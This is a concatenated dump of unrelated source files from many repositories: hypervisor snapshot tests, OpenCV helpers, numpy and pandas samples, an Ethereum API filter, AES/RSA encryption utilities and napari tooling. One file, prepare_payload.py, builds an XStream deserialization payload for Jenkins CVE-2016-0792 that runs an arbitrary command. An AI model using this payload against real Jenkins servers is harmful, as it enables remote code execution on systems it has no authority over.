ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
# Ensure the page is dirty.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, True,
'The TEB page is expected to be dirty.'
)
# Grab a snapshot.
Snapshot = self.Partition.Save()
# Make sure the page is clean again.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, False,
'The TEB page is expected to be clean after snapshot.'
)
# Dirty the TEB page.
Code = WriteMemory64(self.TebGva, 1) + Int3
ct.memmove(self.CodeHva, Code, len(Code))
self.Vp.SetRip(self.CodeGva)
self.Vp.Run()
# Ensure the page is dirty.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, True,
'The TEB page is expected to be dirty.'
)
# Restore the snapshot.
self.Partition.Restore(Snapshot)
# Ensure the page is back clear again.
Dirty = self.Partition.IsGpaDirty(TebGpa)
self.assertEqual(
Dirty, False,
'The TEB page is expected to be clean after restore.'
)
def main(argc, argv):
HypervisorPresent = hv.IsHypervisorPresent()
print 'HypervisorPresent:', HypervisorPresent
if not HypervisorPresent:
return 1
unittest.main(verbosity = 2)
return 0
if __name__ == '__main__':
sys.exit(main(len(sys.argv), sys.argv))
``` |
{
"source": "0versun/telega_moto",
"score": 4
} |
#### File: telega_moto/data/timing_processor.py
```python
import datetime
def return_dif(target_year, target_mont, target_day):
today = datetime.date.today()
targer = datetime.date(int(target_year), int(target_mont), int(target_day))
if targer < today:
output_day = today - targer
print('Эта дата уже наступила и прошла', output_day.days)
return 'нисколько, эта дата уже наступила и прошла'
elif targer == today:
return 'нисколько, потому что, этот день настал сегодня'
else:
output_day = targer - today
return output_day.days
``` |
{
"source": "0w1Gr3y/MOT_ByteTrack",
"score": 3
} |
#### File: 0w1Gr3y/MOT_ByteTrack/utils.py
```python
import numpy as np
import cv2 as cv
def resize_image(image, new_size=(-1, 400), interpolation=cv.INTER_LINEAR):
'''
:param image: input image
:param new_size: (width, height) or (-1, h) or (w, -1)
:param interpolation: opencv cv.INTER_* flag
:return: resized image
'''
image_size = (image.shape[1], image.shape[0])
if new_size[0] == -1:
image_size_new = (int(image_size[0] * new_size[1] / image_size[1]), new_size[1])
elif new_size[1] == -1:
image_size_new = (new_size[0], int(image_size[1] * new_size[0] / image_size[0]))
else:
image_size_new = (new_size[1], new_size[0])
return cv.resize(image, image_size_new, interpolation=interpolation) # )
def show_image(image_name, image, new_size=(-1, 400)):
'''
:param image_name: image window name
:param image: input image
:param new_size: (width, height) or (-1, h) or (w, -1)
:return:
'''
image_show = resize_image(image, new_size)
cv.imshow(image_name, image_show)
```
#### File: 0w1Gr3y/MOT_ByteTrack/VideoPlayer.py
```python
import cv2 as cv
class VideoPlayer:
def __init__(self, video_path):
self.video_path = video_path
self.video_cap = cv.VideoCapture(video_path)
if not self.video_cap.isOpened():
print("Error opening video stream or file")
self.video_cap = None
return
self.fps = int(self.video_cap.get(cv.CAP_PROP_FPS))
self.cv_wait_time = int(1000 / self.fps)
self.width = int(self.video_cap.get(cv.CAP_PROP_FRAME_WIDTH))
self.height = int(self.video_cap.get(cv.CAP_PROP_FRAME_HEIGHT))
print('inited video capture \"{}\" | FPS: {} | Resolution: {}x{}'.format(video_path, self.fps,
self.video_cap.get(
cv.CAP_PROP_FRAME_WIDTH),
self.video_cap.get(
cv.CAP_PROP_FRAME_HEIGHT)))
def get_frame(self):
ret, frame = self.video_cap.read()
return ret, frame
def reset(self):
self.video_cap.release()
self.video_cap = cv.VideoCapture(self.video_path)
def __del__(self):
if self.video_cap is not None:
self.video_cap.release()
``` |
{
"source": "0w8States/Drive-Manager-2-Utilites",
"score": 3
} |
#### File: 0w8States/Drive-Manager-2-Utilites/main.py
```python
IMPORT_PATH = "./motor-parameter-files/"
#Directory where to export the DM2 files
EXPORT_PATH = ""
#Path for DM2 XML Templates
XML_TEMPLATES = "./XML_Templates/"
import os
from DM2 import MotorUtility
import traceback
import logging
#Walk the OS path to for any files in the director or sub-directories
def ccm_folder_walk(IMPORT_PATH):
filelist = []
for root, dirs, files in os.walk(IMPORT_PATH):
for file in files:
if file[-4:] == ".ccm":
#Append the file name to the list
filelist.append(os.path.join(root,file))
return filelist
def main():
#Create and EL7411 Object
dm2motor = MotorUtility()
#Mass Import Routine
filelist = ccm_folder_walk(IMPORT_PATH)
print(f"Now Importing {len(filelist)} Motor Files...")
dc_motor_count = 0
ac_motor_count = 0
for file in filelist:
try:
dm2motor.import_ccm_motordata(file)
#You can print the motor data for each file like this
#print(el7411.get_motor_data())
if dm2motor.IsAc == "false":
dm2motor.export_EL7411_dmmotor(EXPORT_PATH)
dc_motor_count += 1
except Exception as e:
print("On File:", file)
logging.error(traceback.format_exc())
# Logs the error appropriately.
print(f"Number of DC Motors Exported: {dc_motor_count}")
print(f"Number of AC Motors Exported: {ac_motor_count}")
if __name__ == '__main__':
main()
``` |
{
"source": "0w8States/numpy-stack-samples",
"score": 4
} |
#### File: numpy-stack-samples/numpy/matrix-dot-speed.py
```python
import numpy as np
from datetime import datetime
# note: you can also use %timeit
a = np.random.randn(100)
b = np.random.randn(100)
T = 100000
def slow_dot_product(a, b):
result = 0
for e, f in zip(a, b):
result += e*f
return result
t0 = datetime.now()
for t in range(T):
slow_dot_product(a, b)
dt1 = datetime.now() - t0
t0 = datetime.now()
for t in range(T):
a.dot(b)
dt2 = datetime.now() - t0
print("Time for slow method:", dt1.total_seconds())
print("Time for fast method:", dt2.total_seconds())
print("(slow / fast) Factor:", dt1.total_seconds() / dt2.total_seconds())
```
#### File: numpy-stack-samples/pandas/donut-dataset.py
```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plot
# Function to generate datapoints
def create_donut(radius, size):
# assume that arr is in polar coordinates
arr = np.array([np.linspace(0, 2 * np.pi, size), np.random.randn(size)]).T + radius
cartesian_arr = np.array([arr[:, 1] * np.cos(arr[:, 0]), arr[:, 1] * np.sin(arr[:, 0])]).T
return cartesian_arr
# Function to square values
def square_x1(row):
return float(row['x1']**2) # select only the year, 0th element in this case
def square_x2(row):
return float(row['x2']**2) # select only the year, 0th element in this case
# Function to multiply values
def multiply_x1x2(row):
return float(row['x1'] * row['x2']) # select only the year, 0th element in this case
# Generate numpy arrays
outerCircle = create_donut(10, 5000)
innerCircle = create_donut(5, 5000)
# Outer donut dataframe
dfo = pd.DataFrame(outerCircle, columns=["x1", "x2"])
dfo["y"] = 1
# Inner donut dataframe
dfi = pd.DataFrame(innerCircle, columns=["x1", "x2"])
dfi["y"] = 0
# Generate DataFrame for result csv
df = pd.concat([dfi, dfo], ignore_index=True)
# Apply quadratic feature expansion
df["x1^2"] = df.apply(square_x1, axis=1)
df["x2^2"] = df.apply(square_x2, axis=1)
df["x1*x2"] = df.apply(multiply_x1x2, axis=1)
# Rearrange columns
df = df[["x1", "x2", "x1^2", "x2^2", "x1*x2", "y"]]
# (Optional) Shuffle to mix up "y" values
# df = df.sample(frac=1.0)
# Export to CSV
df.to_csv("result.csv", header=True, index=False)
# Plot
ax = dfo.plot(x=0, y=1, kind="scatter", color="blue")
dfi.plot(x=0, y=1, kind="scatter", color="red", ax=ax, figsize=(15, 15), legend=False)
plot.show()
``` |
{
"source": "0x0000002A/eth_spider",
"score": 3
} |
#### File: eth_spider/utils/filter.py
```python
import json
import os
import settings
#todo move to file*.py
class FilterAppendRule(object):
# decoder encoder todo
# switch selector/parser automatically todo
def json_dict_parse(self, string):
#from json to dict
return json.loads(string)
def dict_selector(self, current_dict, element_list):
selected_dict = dict
if len(element_list) != 0:
selected_dict = dict((key, current_dict[key]) for key in element_list if key in current_dict)
current_dict = selected_dict
return selected_dict
def html_selector(self, html, elements):
pass
def dict_value_to_string_parse(self,current_dict,sep=","):
value_list = []
for key,value in current_dict.items():
value_list.append(value)
return sep.join(value_list)
def dict_key_to_string_parse(self,current_dict,sep=","):
key_list = []
for key,value in current_dict.items():
key_list.append(key)
return sep.join(key_list)
class ImplFilter:
def __init__(self, content):
self.append_rule = FilterAppendRule
#input content
self.content_raw = content
self.selected_elements = []
def eth_api_reponse_filter(self):
# todo to create a eth_api layer
self.content_dict = self.append_rule.json_dict_parse(self.append_rule, self.content_raw)
self.append_rule.dict_selector(self.append_rule, self.content_dict, ["result"])
# todo should be adaptable for multiple types of "result"
self.content_result_list = self.content_dict["result"]
if type(self.content_result_list) != list:
pass #exception
if type(self.content_result_list[0]) != dict:
pass # raise "error"
for line in self.content_result_list:
self.append_rule.dict_selector(self.append_rule, line, self.selected_elements)
def eth_api_response_storage_filter(self):
# todo move to filter combining the file/storage type
if type(self.content_result_list) != list:
pass #exception
if type(self.content_result_list[0]) != dict:
pass # raise "error"
# todo combining file type
self.file_content = ""
line = ""
header = ""
if len(self.content_result_list) > 0:
header = self.append_rule.dict_key_to_string_parse(self.append_rule, self.content_result_list[0])
for line_dict in self.content_result_list:
line = self.append_rule.dict_value_to_string_parse(self.append_rule, line_dict)
self.file_content = self.file_content + line + settings.LINESEP
self.file_content = header + settings.LINESEP + self.file_content
``` |
{
"source": "0x00-0x00/jenkins-cve-2016-0792",
"score": 3
} |
#### File: 0x00-0x00/jenkins-cve-2016-0792/prepare_payload.py
```python
def prepare_payload(command):
splitCommand = command.split()
preparedCommands = ''
for entry in splitCommand:
preparedCommands += f'<string>{entry}</string>'
xml = f'''
<map>
<entry>
<groovy.util.Expando>
<expandoProperties>
<entry>
<string>hashCode</string>
<org.codehaus.groovy.runtime.MethodClosure>
<delegate class="groovy.util.Expando"/>
<owner class="java.lang.ProcessBuilder">
<command>{preparedCommands}</command>
</owner>
<method>start</method>
</org.codehaus.groovy.runtime.MethodClosure>
</entry>
</expandoProperties>
</groovy.util.Expando>
<int>1</int>
</entry>
</map>'''
return xml
``` |
{
"source": "0x00-0x00/netbruter",
"score": 3
} |
#### File: netbruter/src/netbios.py
```python
from nmb.NetBIOSProtocol import NBNSProtocol, NetBIOSTimeout
class NetBiosDiscovery(object):
def __init__(self, address, port=137):
self.ip = address
self.port = port
self.nbns = NBNSProtocol()
def start(self):
try:
# Try to reach the server
response = self.nbns.queryIPForName(self.ip, port=self.port, \
timeout=30)
except NetBIOSTimeout:
print("[!] Error: NetBIOS Name Service response timed out.")
return False
return response
``` |
{
"source": "0x00-0x00/shellcoding",
"score": 3
} |
#### File: 0x00-0x00/shellcoding/project_setup.py
```python
import sys
# Default file with project data
default_file = "project.data"
# setup.py data
setup_data = """from setuptools import setup
setup(name='%s',
version='%s',
description='%s',
url='%s',
author='%s',
author_email='%s',
license='%s',
packages=['%s'],
package_dir={'%s': 'src'},
package_data={'%s': ['src/*']},
scripts=%s,
zip_safe=False)
"""
def parse_data(f):
data = dict()
# Open the file and get the uncommented data
with open(f, "r") as f:
for line in f.readlines():
if line[0] is "#" or len(line) < 2: # Ignore comments
continue
key, value = line.split("=")
data[key] = str(value.replace("\n", "")).replace('"', "'")
return data
def validate_data(data):
REQUIRED_OPTIONS = [
"PROJECT_NAME",
"PROJECT_VERSION",
"PROJECT_AUTHOR",
]
for k in data:
v = data[k]
# Check for empty data of required fields.
if v is "" and k in REQUIRED_OPTIONS:
print("[*] Validation error: {0} is empty.".format(k))
sys.exit(-1)
elif v is "":
print("[+] Setting value of key '{0}' to 'None'".format(k))
data[k] = "None"
return data
def main():
p = validate_data(parse_data(default_file))
print(setup_data % (
p["PROJECT_NAME"],
p["PROJECT_VERSION"],
p["PROJECT_DESCRIPTION"],
p["PROJECT_URL"],
p["PROJECT_AUTHOR"],
p["AUTHOR_EMAIL"],
p["PROJECT_LICENSE"],
p["PROJECT_PACKAGE"],
p["PROJECT_PACKAGE"],
p["PROJECT_PACKAGE"],
p["PROJECT_BINARIES"],
))
return 0
if __name__ == "__main__":
main()
```
#### File: shellcoding/src/hexdecode.py
```python
class HexDecode(object):
def __init__(self, data):
self.data = self._format_data(data)
@staticmethod
def _format_data(data):
data = data.replace("0x", "")
return data
def _convert(self):
hex_out = list()
for i in range(0, len(self.data), 2):
hex_out.append(int(self.data[i: i+2], 16))
return ''.join([chr(x) for x in hex_out])[::-1]
``` |
{
"source": "0x00-0x00/shemutils",
"score": 3
} |
#### File: shemutils/src/encryption.py
```python
import os
import time
import random
import hashlib
import getpass
import sys
import struct
import rsa
import multiprocessing
from Crypto.Cipher import AES
from shemutils.logger import Logger
class Key(object):
"""
Class Key written by shemhazai
This method generates a random key, unencoded or encoded in base64.
"""
def __init__(self, bits):
self.key_size = bits
if self._parse_bits() != 0:
self.key = None
else:
self.key = self._generate_key()
def _parse_bits(self):
"""Parse if the input int is divisible by 2"""
if self.key_size % 2 != 0:
return -1
return 0
def _generate_key(self):
"""Generate random bytes and join them into a single string"""
return ''.join(chr(random.randint(0, 0xFF)) for i in range(self.key_size))
def get(self, encoded=False):
"""
Method for returning the generated key
:param encoded: Boolean
:return: key string
"""
if encoded is True:
return base64.b64encode(self.key)
return self.key
class Encryption:
"""This module uses pycrypto for AES encryption"""
def __init__(self):
pass
@staticmethod
def create_iv():
iv = os.urandom(16)
return iv
@staticmethod
def hash256(string):
if type(string) is str:
return hashlib.sha256(string.encode()).digest()
else:
return hashlib.sha256(string).digest()
@staticmethod
def hash512(string):
if type(string) is str:
return hashlib.sha512(string.encode()).digest()
else:
return hashlib.sha512(string).digest()
@staticmethod
def hashmd5(string):
if type(string) is str:
return hashlib.md5(string.encode()).digest()
else:
return hashlib.md5(string).digest()
@staticmethod
def get_key(bits=256):
sys.stderr.write("Bit-size selected: %d\n" % bits)
k = str()
c = str("c")
while k != c:
if k == c:
break
k = getpass.getpass("Type your key: ", sys.stderr)
c = getpass.getpass("Confirm your key: ", sys.stderr)
if bits == 256:
sys.stderr.write("Generating 256-bit key ...\n")
return Encryption.hash256(k)
elif bits == 128:
sys.stderr.write("Generating 128-bit key ...\n")
return Encryption.hashmd5(k)
@staticmethod
def encrypt_file(file_name, key, iv, output=None, chunksize=64*1024):
if not output:
dire_name = os.path.dirname(file_name)
base_name = os.path.basename(file_name)
if dire_name != "":
output = dire_name + os.sep + base_name + ".enc"
else:
output = base_name + ".enc"
filesize = os.path.getsize(file_name)
encryptor = AES.new(key, AES.MODE_CBC, iv)
with open(file_name, "rb") as infile:
with open(output, "wb") as outfile:
outfile.write(struct.pack("<Q", filesize))
outfile.write(iv)
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += " ".encode() * (16 - len(chunk) % 16)
outfile.write(encryptor.encrypt(chunk))
return True
@staticmethod
def decrypt_file(file_name, key, output=None, chunksize=64*1024):
if not output:
root_name, ext = os.path.splitext(file_name)
if ext != ".enc":
return False
dir_name = os.path.dirname(root_name) + os.sep
f_name = os.path.basename(root_name)
if dir_name != "/":
output = dir_name + f_name
else:
output = f_name
with open(file_name, "rb") as infile:
origsize = struct.unpack("<Q", infile.read(struct.calcsize('Q')))[0]
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)
with open(output, "wb") as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
outfile.write(decryptor.decrypt(chunk))
outfile.truncate(origsize)
return True
@staticmethod
def get_chunk(msg, index, chunksize=16):
return msg[index:index+chunksize]
@staticmethod
def split_string(string, chunksize=16):
output = []
for x in range(0, len(string), chunksize):
part = Encryption.get_chunk(string, x, chunksize=chunksize)
if len(part) % 16 != 0:
part += " " * (16 - len(part) % 16)
output.append(part)
return output
@staticmethod
def encrypt_message(plaintext, key, iv):
"""
Function to encrypt a plaintext message.
Also checks if IV length is correct.
"""
psize = sys.getsizeof(plaintext)
if len(iv) != 16:
return "Error: Invalid IV size."
encryptor = AES.new(key, AES.MODE_CBC, iv)
cipher = bytes()
cipher += struct.pack("<Q", psize)
cipher += iv
for chunk in Encryption.split_string(plaintext):
cipher += encryptor.encrypt(chunk)
return cipher
@staticmethod
def decrypt_message(cipher, key):
"""
Function to decrypt data from input.
Also checks if IV length is correct.
"""
iv = cipher[struct.calcsize("Q"):struct.calcsize("3Q")]
if len(iv) != 16:
return "Error: Invalid IV size."
decryptor = AES.new(key, AES.MODE_CBC, iv)
plaintext = str()
for chunk in Encryption.split_string(cipher[struct.calcsize("3Q"):]):
plaintext += decryptor.decrypt(chunk).decode()
return plaintext
class RSA:
"""This class have dependencies.
multiprocessing, rsa modules are needed.
"""
def __init__(self):
self.logger = Logger("RSA")
self.public_key = None
self.private_key = None
self.cpu_count = multiprocessing.cpu_count()
def generate_keypair(self, bits=4096, v=True):
if v is not False:
self.logger.info("Generating new %d-bits key pair ..." % bits)
t1 = time.time()
self.public_key, self.private_key = rsa.newkeys(bits, poolsize=self.cpu_count)
t2 = time.time()
if v is not False:
self.logger.info("Key pair generation took {0} seconds.".format(t2-t1))
return True
def encrypt_message(self, message, v=False):
"""
:param message: string
:param v: boolean # stands for verbose
:return:
"""
if v is not False:
self.logger.info("Encrypting message ...")
s1 = time.time()
crypto = rsa.encrypt(message, self.public_key)
s2 = time.time()
if v is not False:
self.logger.info("Encryption success.")
self.logger.info("Procedure took {0} seconds.".format(s2-s1))
return crypto
def decrypt_message(self, cipher, v=False):
if v is not False:
self.logger.info("Decrypting cipher ...")
s1 = time.time()
decrypto = rsa.decrypt(cipher, self.private_key)
s2 = time.time()
if v is not False:
self.logger.info("Decryption success.")
self.logger.info("Procedure took %d seconds." % (s2 - s1))
return decrypto
def save_keys(self, priv_f="private_key.pem", pub_f="public_key.pem", v=False):
if self.public_key is None:
self.logger.error("Public Key does not exists. Generate it.")
return False
if self.private_key is None:
self.logger.error("Private Key does not exists. Generate it.")
return False
with open(priv_f, "w") as priv:
priv.write(self.private_key.save_pkcs1().decode())
self.logger.info("Private key saved to file '%s'" % priv_f)
with open(pub_f, "w") as pub:
pub.write(self.public_key.save_pkcs1().decode())
if v is True:
self.logger.info("Public key saved to file '%s" % pub_f)
return True
def load_keys(self, priv_f, pub_f, v=False):
if not os.path.isfile(priv_f):
self.logger.error("Private key file does not exists.")
if not os.path.isfile(pub_f):
self.logger.error("Public key file does not exists.")
with open(priv_f, "rb") as priv:
priv_data = priv.read()
with open(pub_f, "rb") as pub:
pub_data = pub.read()
self.private_key = rsa.PrivateKey.load_pkcs1(priv_data)
self.public_key = rsa.PublicKey.load_pkcs1(pub_data)
if v is True:
self.logger.info("Key pair successfully loaded.")
return True
``` |
{
"source": "0x00-0xFF/home-assistant",
"score": 2
} |
#### File: components/dsmr_reader/sensor.py
```python
import logging
from homeassistant.components import mqtt
from homeassistant.core import callback
from homeassistant.helpers.entity import Entity
from homeassistant.util import slugify
from .definitions import DEFINITIONS
_LOGGER = logging.getLogger(__name__)
DOMAIN = "dsmr_reader"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up DSMR Reader sensors."""
sensors = []
for topic in DEFINITIONS:
sensors.append(DSMRSensor(topic))
async_add_entities(sensors)
class DSMRSensor(Entity):
"""Representation of a DSMR sensor that is updated via MQTT."""
def __init__(self, topic):
"""Initialize the sensor."""
self._definition = DEFINITIONS[topic]
self._entity_id = slugify(topic.replace("/", "_"))
self._topic = topic
self._name = self._definition["name"]
self._unit_of_measurement = (
self._definition["unit"] if "unit" in self._definition else ""
)
self._icon = self._definition["icon"] if "icon" in self._definition else None
self._transform = (
self._definition["transform"] if "transform" in self._definition else None
)
self._state = None
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
@callback
def message_received(message):
"""Handle new MQTT messages."""
if self._transform is not None:
self._state = self._transform(message.payload)
else:
self._state = message.payload
self.async_schedule_update_ha_state()
return await mqtt.async_subscribe(self.hass, self._topic, message_received, 1)
@property
def name(self):
"""Return the name of the sensor supplied in constructor."""
return self._name
@property
def entity_id(self):
"""Return the entity ID for this sensor."""
return f"sensor.{self._entity_id}"
@property
def state(self):
"""Return the current state of the entity."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit_of_measurement of this sensor."""
return self._unit_of_measurement
@property
def icon(self):
"""Return the icon of this sensor."""
return self._icon
``` |
{
"source": "0x006E/twweet-cli",
"score": 3
} |
#### File: twweet_cli/config/ConfigReader.py
```python
import yaml
import os
from os.path import expanduser
home = expanduser("~")
class ConfigurationReader(object):
__tweets = None
__hashtag = None
def __init__(self):
ymlfile = home + '/.twweet-cli/data/config.yml'
if os.path.isfile(ymlfile):
with open(ymlfile, 'r') as file:
cfg = yaml.load(file)
ConfigurationReader.__tweets = cfg['Tweets']
ConfigurationReader.__hashtag = cfg['HashTag']
else:
if not os.path.exists(home + '/.twweet-cli/data'):
os.makedirs(home + '/.twweet-cli/data')
with open(home + '/.twweet-cli/data/config.yml', 'w') as ymlfile:
ymlLine1 = "#Depending on the system(Windows or Linux) change the\
backward or forward slash appropriately."
ymlLine2 = "Tweets: /TweetsStore/"
ymlLine3 = "HashTag: /HashTagStore/"
ymlfile.write("%s\n%s\n%s\n" % (ymlLine1, ymlLine2, ymlLine3))
@staticmethod
def get_tweets_storage():
return ConfigurationReader.__tweets
@staticmethod
def get_hashtag_storage():
return ConfigurationReader.__hashtag
``` |
{
"source": "0x00b1/napari",
"score": 3
} |
#### File: napari/utils/notebook_display.py
```python
import base64
from io import BytesIO
__all__ = ['nbscreenshot']
class NotebookScreenshot:
"""Display napari screenshot in the jupyter notebook.
Functions returning an object with a _repr_png_() method
will displayed as a rich image in the jupyter notebook.
https://ipython.readthedocs.io/en/stable/api/generated/IPython.display.html
Parameters
----------
viewer : napari.Viewer
The napari viewer.
canvas_only : bool, optional
If True includes the napari viewer frame in the screenshot,
otherwise just includes the canvas. By default, True.
Examples
--------
```
import napari
from napari.utils import nbscreenshot
from skimage.data import chelsea
viewer = napari.view_image(chelsea(), name='chelsea-the-cat')
nbscreenshot(viewer)
# screenshot just the canvas with the napari viewer framing it
nbscreenshot(viewer, canvas_only=False)
```
"""
def __init__(self, viewer, *, canvas_only=False):
"""Initialize screenshot object.
Parameters
----------
viewer : napari.Viewer
The napari viewer
canvas_only : bool, optional
If False include the napari viewer frame in the screenshot,
and if True then take screenshot of just the image display canvas.
By default, False.
"""
self.viewer = viewer
self.canvas_only = canvas_only
self.image = None
def _repr_png_(self):
"""PNG representation of the viewer object for IPython.
Returns
-------
In memory binary stream containing PNG screenshot image.
"""
from imageio import imsave
from .._qt.qt_event_loop import get_app
get_app().processEvents()
self.image = self.viewer.screenshot(canvas_only=self.canvas_only)
with BytesIO() as file_obj:
imsave(file_obj, self.image, format='png')
file_obj.seek(0)
png = file_obj.read()
return png
def _repr_html_(self):
png = self._repr_png_()
url = 'data:image/png;base64,' + base64.b64encode(png).decode('utf-8')
html = f'<img src="{url}"></img>'
return html
nbscreenshot = NotebookScreenshot
```
#### File: napari/tools/test_strings.py
```python
import ast
import os
import tokenize
from pathlib import Path
from types import ModuleType
from typing import Dict, List, Optional, Set, Tuple
import pytest
from strings_list import (
SKIP_FILES,
SKIP_FOLDERS,
SKIP_WORDS,
SKIP_WORDS_GLOBAL,
)
REPO_ROOT = Path(__file__).resolve()
NAPARI_MODULE = (REPO_ROOT / "napari").relative_to(REPO_ROOT)
# Types
StringIssuesDict = Dict[str, List[Tuple[int, str]]]
OutdatedStringsDict = Dict[str, List[str]]
TranslationErrorsDict = Dict[str, List[Tuple[str, str]]]
class FindTransStrings(ast.NodeVisitor):
"""This node visitor finds translated strings."""
def __init__(self):
super().__init__()
self._found = set()
self._trans_errors = []
def _check_vars(self, method_name, args, kwargs):
"""Find interpolation variables inside a translation string.
This helps find any variables that need to be interpolated inside
a string so we can check against the `kwargs` for both singular
and plural strings (if present) inside `args`.
Parameters
----------
method_name : str
Translation method used. Options include "_", "_n", "_p" and
"_np".
args : list
List of arguments passed to translation method.
kwargs : kwargs
List of keyword arguments passed to translation method.
"""
singular_kwargs = set(kwargs) - set({"n"})
plural_kwargs = set(kwargs)
# If using trans methods with `context`, remove it since we are
# only interested in the singular and plural strings (if any)
if method_name in ["_p", "_np"]:
args = args[1:]
# Iterate on strings passed to the trans method. Could be just a
# singular string or a singular and a plural. We use the index to
# determine which one is used.
for idx, arg in enumerate(args):
found_vars = set()
check_arg = arg[:]
check_kwargs = {}
while True:
try:
check_arg.format(**check_kwargs)
except KeyError as err:
key = err.args[0]
found_vars.add(key)
check_kwargs[key] = 0
continue
break
if idx == 0:
check_1 = singular_kwargs - found_vars
check_2 = found_vars - singular_kwargs
else:
check_1 = plural_kwargs - found_vars
check_2 = found_vars - plural_kwargs
if check_1 or check_2:
error = (arg, check_1.union(check_2))
self._trans_errors.append(error)
def visit_Call(self, node):
method_name, args, kwargs = "", [], []
try:
if node.func.value.id == "trans":
method_name = node.func.attr
# Args
args = []
for item in [arg.value for arg in node.args]:
args.append(item)
self._found.add(item)
# Kwargs
kwargs = []
for item in [kw.arg for kw in node.keywords]:
if item != "deferred":
kwargs.append(item)
except Exception:
pass
if method_name:
self._check_vars(method_name, args, kwargs)
self.generic_visit(node)
def reset(self):
"""Reset variables storing found strings and translation errors."""
self._found = set()
self._trans_errors = []
show_trans_strings = FindTransStrings()
def _find_func_definitions(
node: ast.AST, defs: List[ast.FunctionDef] = []
) -> List[ast.FunctionDef]:
"""Find all functions definition recrusively.
This also find functions nested inside other functions.
Parameters
----------
node : ast.Node
The initial node of the ast.
defs : list of ast.FunctionDef
A list of function definitions to accumulate.
Returns
-------
list of ast.FunctionDef
Function definitions found in `node`.
"""
try:
body = node.body
except Exception:
body = []
for node in body:
_find_func_definitions(node, defs=defs)
if isinstance(node, ast.FunctionDef):
defs.append(node)
return defs
def find_files(
path: str,
skip_folders: tuple,
skip_files: tuple,
extensions: tuple = (".py",),
) -> List[str]:
"""Find recursively all files in path.
Parameters
----------
path : str
Path to a folder to find files in.
skip_folders : tuple
Skip folders containing folder to skip
skip_files : tuple
Skip files.
extensions : tuple, optional
Extensions to filter by. Default is (".py", )
Returns
-------
list
Sorted list of found files.
"""
found_files = []
for root, _dirs, files in os.walk(path, topdown=False):
for filename in files:
fpath = os.path.join(root, filename)
if any(folder in fpath for folder in skip_folders):
continue
if fpath in skip_files:
continue
if filename.endswith(extensions):
found_files.append(fpath)
return list(sorted(found_files))
def find_docstrings(fpath: str) -> Dict[str, str]:
"""Find all docstrings in file path.
Parameters
----------
fpath : str
File path.
Returns
-------
dict
Simplified string as keys and the value is the original docstring
found.
"""
with open(fpath) as fh:
data = fh.read()
module = ast.parse(data)
docstrings = []
function_definitions = _find_func_definitions(module)
docstrings.extend([ast.get_docstring(f) for f in function_definitions])
class_definitions = [
node for node in module.body if isinstance(node, ast.ClassDef)
]
docstrings.extend([ast.get_docstring(f) for f in class_definitions])
method_definitions = []
for class_def in class_definitions:
method_definitions.extend(
[
node
for node in class_def.body
if isinstance(node, ast.FunctionDef)
]
)
docstrings.extend([ast.get_docstring(f) for f in method_definitions])
docstrings.append(ast.get_docstring(module))
docstrings = [doc for doc in docstrings if doc]
results = {}
for doc in docstrings:
key = " ".join([it for it in doc.split() if it != ""])
results[key] = doc
return results
def find_strings(fpath: str) -> Dict[Tuple[int, str], Tuple[int, str]]:
"""Find all strings (and f-strings) for the given file.
Parameters
----------
fpath : str
File path.
Returns
-------
dict
A dict with a tuple for key and a tuple for value. The tuple contains
the line number and the stripped string. The value containes the line
number and the original string.
"""
strings = {}
with open(fpath) as f:
for toktype, tokstr, (lineno, _), _, _ in tokenize.generate_tokens(
f.readline
):
if toktype == tokenize.STRING:
try:
string = eval(tokstr)
except Exception:
string = eval(tokstr[1:])
if isinstance(string, str):
key = " ".join([it for it in string.split() if it != ""])
strings[(lineno, key)] = (lineno, string)
return strings
def find_trans_strings(
fpath: str,
) -> Tuple[Dict[str, str], List[Tuple[str, Set[str]]]]:
"""Find all translation strings for the given file.
Parameters
----------
fpath : str
File path.
Returns
-------
tuple
The first item is a dict with a stripped string as key and the
orginal string for value. The second item is a list of tuples that
includes errors in translations.
"""
with open(fpath) as fh:
data = fh.read()
module = ast.parse(data)
trans_strings = {}
show_trans_strings.visit(module)
for string in show_trans_strings._found:
key = " ".join([it for it in string.split()])
trans_strings[key] = string
errors = list(show_trans_strings._trans_errors)
show_trans_strings.reset()
return trans_strings, errors
def import_module_by_path(fpath: str) -> Optional[ModuleType]:
"""Import a module given py a path.
Parameters
----------
fpath : str
The path to the file to import as module.
Returns
-------
ModuleType or None
The imported module or `None`.
"""
import importlib.util
fpath = fpath.replace("\\", "/")
module_name = fpath.replace(".py", "").replace("/", ".")
try:
spec = importlib.util.spec_from_file_location(module_name, fpath)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
except Exception:
module = None
return module
def find_issues(
paths: List[str], skip_words: List[str]
) -> Tuple[StringIssuesDict, OutdatedStringsDict, TranslationErrorsDict]:
"""Find strings that have not been translated, and errors in translations.
This will not raise errors but return a list with found issues wo they
can be fixed at once.
Parameters
----------
paths : list of str
List of paths to files to check.
skip_words : list of str
List of words that should be skipped inside the given file.
Returns
-------
tuple
The first item is a dictionary of the list of issues found per path.
Each issue is a tuple with line number and the untranslated string.
The second item is a dictionary of files that contain outdated
skipped strings. The third item is a dictionary of the translation
errors found per path. Translation errors referes to missing
interpolation variables, or spelling errors of the `deferred` keyword.
"""
issues = {}
outdated_strings = {}
trans_errors = {}
for fpath in paths:
issues[fpath] = []
strings = find_strings(fpath)
trans_strings, errors = find_trans_strings(fpath)
doc_strings = find_docstrings(fpath)
skip_words_for_file = skip_words.get(fpath, [])
skip_words_for_file_check = skip_words_for_file[:]
module = import_module_by_path(fpath)
try:
__all__strings = module.__all__
except Exception:
__all__strings = []
for key in strings:
_lineno, string = key
_lineno, value = strings[key]
if (
string not in doc_strings
and string not in trans_strings
and value not in skip_words_for_file
and value not in __all__strings
and string != ""
and string.strip() != ""
and value not in SKIP_WORDS_GLOBAL
):
